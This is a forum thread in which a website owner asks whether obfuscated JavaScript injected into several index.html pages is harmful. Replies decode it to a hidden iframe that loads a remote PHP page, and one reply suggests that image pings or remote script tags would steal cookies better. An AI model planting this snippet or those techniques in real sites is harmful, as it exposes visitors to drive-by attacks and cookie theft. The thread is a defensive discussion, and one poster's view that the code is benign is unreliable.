Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 9 of 9
  1. #1
    Regular Coder logictrap's Avatar
    Join Date
    Apr 2008
    Posts
    155
    Thanks
    11
    Thanked 3 Times in 3 Posts

    Suspicious Code found in web page

    I have sites on a shared hosting service and found the following code on a page which is very suspicious to me. At first it looks like google stuff but it looks strange to me.

    Can someone let me know if this is some type of harmful code:

    Code:
    <script type='text/javascript'>var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=210" style="visibility: hidden;"></'+str3+'rame>');</script>

    Which came first - the chicken or the egg? The egg... [ticket closed]
    If a tree falls... does it make a sound? Yes.............. [ticket closed]

  • #2
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,314
    Thanks
    203
    Thanked 2,565 Times in 2,543 Posts
    This translates to the address:

    http://www.kulkarnioo71.com/index.php?id=210

    I have no idea what this does, and I don't plan to find out, but you can be sure it is bad news. Delete it. Then report it to your host and take steps to prevent it from coming back.


    "I cannot conceive that anybody will require multiplications at the rate of 40,000 or even 4,000 per hour ..." -- F. H. Wales (1936)
    Last edited by Philip M; 01-15-2009 at 05:36 PM.

  • #3
    Senior Coder rnd me's Avatar
    Join Date
    Jun 2007
    Location
    Urbana
    Posts
    4,461
    Thanks
    11
    Thanked 600 Times in 580 Posts
    i don't think javascript can be really harmful, just annoying.
    after all, javascript can be turned off with a click or two...
    your app should not be programmed in a way that compromises user information, even if attacked. an attacker can;t steal what he doesn't have.

    this is a poor attempt at an XSS attack, script kiddie type material.
    all it can really do is count hits.


    Code:
    <iframe width=1 height=1 src="http://kulkarnioo71.com/index.php?id=210" style="visibility: hidden;"></iframe>
    it would be a much better attack to use something like an <a ping="xss">, an img ping, remote script tag etc. that way, the attacker could steal cookies.

    this one is pretty lame, and will click in IE, making even non-developers suspicious.
    the outside domain of the iframe prevents juicer interaction between remote host and your page.

    sounds like you need to not republish anonymously submitted content without sanitizing it.
    my site (updated 2014/10/20)
    BROWSER STATS [% share] (2014/9/03) IE7:0.1, IE8:4.3, IE11:9.2, IE9:2.7, IE10:2.6, FF:16.8, CH:47.5, SF:7.8, NON-MOUSE:37%

  • #4
    Regular Coder logictrap's Avatar
    Join Date
    Apr 2008
    Posts
    155
    Thanks
    11
    Thanked 3 Times in 3 Posts
    Thanks - I was afraid of that.

    I'm confused how this was able to be inserted into these files as they are not files that display any user contributed data.

    If I ran a php script to add code it would not work because the files do not have write permission.

    Where do I start?

    Which came first - the chicken or the egg? The egg... [ticket closed]
    If a tree falls... does it make a sound? Yes.............. [ticket closed]

  • #5
    Senior Coder rnd me's Avatar
    Join Date
    Jun 2007
    Location
    Urbana
    Posts
    4,461
    Thanks
    11
    Thanked 600 Times in 580 Posts
    perhaps it part of the user agreement for your hosting; just a guess based on the fact that it's not malicious.

    you could post the code, or provide a link and i can give it a look.
    it's impossible to say "how it got there" without knowing what "there" is.

    EDIT: I guess you can PM me the link if you don't want the whole world seeing it...
    my site (updated 2014/10/20)
    BROWSER STATS [% share] (2014/9/03) IE7:0.1, IE8:4.3, IE11:9.2, IE9:2.7, IE10:2.6, FF:16.8, CH:47.5, SF:7.8, NON-MOUSE:37%

  • #6
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,314
    Thanks
    203
    Thanked 2,565 Times in 2,543 Posts
    rnd me -

    For my edification, could you please explain how you are so sure that this code is not malicious - by which I take it you mean incapable of causing damage? Someone has gone to some trouble to insert/inject it.


    I'm not paranoid! Which of my enemies told you this?
    Last edited by Philip M; 01-15-2009 at 07:38 PM.

  • #7
    Regular Coder logictrap's Avatar
    Join Date
    Apr 2008
    Posts
    155
    Thanks
    11
    Thanked 3 Times in 3 Posts
    rnd me - thanks for the offer. Is it possible you could tell me what you would do to find out more info? I'd like to learn this myself so I can be more self reliant.

    Thanks.

    Which came first - the chicken or the egg? The egg... [ticket closed]
    If a tree falls... does it make a sound? Yes.............. [ticket closed]

  • #8
    Senior Coder rnd me's Avatar
    Join Date
    Jun 2007
    Location
    Urbana
    Posts
    4,461
    Thanks
    11
    Thanked 600 Times in 580 Posts
    Quote Originally Posted by Philip M View Post
    rnd me -

    For my edification, could you please explain how you are so sure that this code is not malicious - by which I take it you mean incapable of causing damage? Someone has gone to some trouble to insert/inject it.
    sure.

    it's the most benign type of xss attack.
    1. code size itself does not leave much room to attack.
    2. it does not replicate itself like the newer ones do.
    3. it's not a player in launching ddos attacks.
    4. it doesn't steal cookies, variables, form inputs, or even the queryString.
    5. it's use of an iframe sequesters any malicious code on the remote attack host to it's own domain, rendering the compromised page unreachable by attack code.

    i am by no means saying "ignore it, it doesn't matter", quite the opposite.
    i just mean that it's more like a cold than AIDS.

    However, it's a warning shot across the bow of your server.
    If someone can sneak this in, they can almost assuredly inject something a lot worse as well.

    "This?, this is nothing"

    it's unwelcome, but it's behavior is not dangerous.




    @logictrap-
    i am not sure i can really explain everything i would do.
    It's kinda like asking a dentist to walk you through a DIY root canal over the phone.

    Without looking at anything, i don't know if its an html, php, or a javascript page that contains the attack. I don't know if any forms are in use. I can point out and expand on anything i see, but there's a cornucopia of vectors for this sore of thing.


    finding out how it got there would require examining/collecting evidence, of which i have seen none.


    i would check out the xss cheatsheet if i were you; it will show you how to sniff out attacks. you can readup about xss from several good top10 google "xss" hits.
    my site (updated 2014/10/20)
    BROWSER STATS [% share] (2014/9/03) IE7:0.1, IE8:4.3, IE11:9.2, IE9:2.7, IE10:2.6, FF:16.8, CH:47.5, SF:7.8, NON-MOUSE:37%

  • #9
    Regular Coder logictrap's Avatar
    Join Date
    Apr 2008
    Posts
    155
    Thanks
    11
    Thanked 3 Times in 3 Posts
    It looks like a script was run that looks for a file named index.html and adds the code right after the <body> tag.

    There are several index.html files that were affected and based on the time stamp of the files it appears to have been done by a script as the times are too close together to have been done manually.

    As I said before a simple php script on the site would not have the permissions to overwrite these files as the permissions for the files don't allow this, but then maybe I don't know php as well as I should.

    Any ideas?

    Which came first - the chicken or the egg? The egg... [ticket closed]
    If a tree falls... does it make a sound? Yes.............. [ticket closed]


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •